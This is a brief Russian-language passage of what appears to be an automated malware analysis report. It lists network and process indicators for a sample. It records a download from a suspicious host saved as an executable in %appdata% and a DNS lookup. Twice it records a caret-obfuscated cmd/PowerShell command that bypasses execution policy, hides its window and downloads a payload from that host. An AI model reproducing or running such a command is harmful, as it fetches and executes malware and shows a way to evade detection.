Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowerSHEl^L^.^E^Xe ^-exE^CU^t^iOnpOliCy Byp^Ass -n^opRof^ILe ^-W^I^NdowsTylE hI^d^D^eN (N^e^W-^OBJECt^ SysteM^.n^Et^.W^ebC^lIe^NT^)^.DO^Wn^L^OAdfI^Le('http://toagoores.top/read.php?f...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "PowerSHEl^L^.^E^Xe ^-exE^CU^t^iOnpOliCy Byp^Ass -n^opRof^ILe ^-W^I^NdowsTylE hI^d^D^eN (N^e^W-^OBJECt^ SysteM^.n^Et^.W^ebC^lIe^NT^)^.DO^Wn^L^OAdfI^Le('http://toagoores.top/read.php?f...' (со скрытым окном)